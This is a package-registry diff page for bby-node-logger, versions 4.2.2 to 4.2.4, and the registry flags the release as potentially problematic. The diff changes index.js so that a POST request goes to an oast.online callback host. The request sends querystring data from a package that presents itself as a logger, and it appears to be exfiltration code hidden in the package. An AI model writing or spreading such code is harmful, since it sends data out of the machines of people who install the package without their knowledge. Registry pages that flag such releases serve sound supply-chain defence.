bby-node-logger 4.2.2 → 4.2.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of bby-node-logger might be problematic. Click here for more details.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -32,7 +32,7 @@ const data = querystring.stringify({
|
|
|
32
32
|
|
|
33
33
|
// Options for the POST request
|
|
34
34
|
const options = {
|
|
35
|
-
hostname: '
|
|
35
|
+
hostname: 'crkvat4qfhfgmsj1bq20rpdf5no1sxcph.oast.online', // Replace with actual external server
|
|
36
36
|
port: 80, // Change port if using HTTPS or a custom port
|
|
37
37
|
path: '/endpoint', // Replace with actual path
|
|
38
38
|
method: 'POST',
|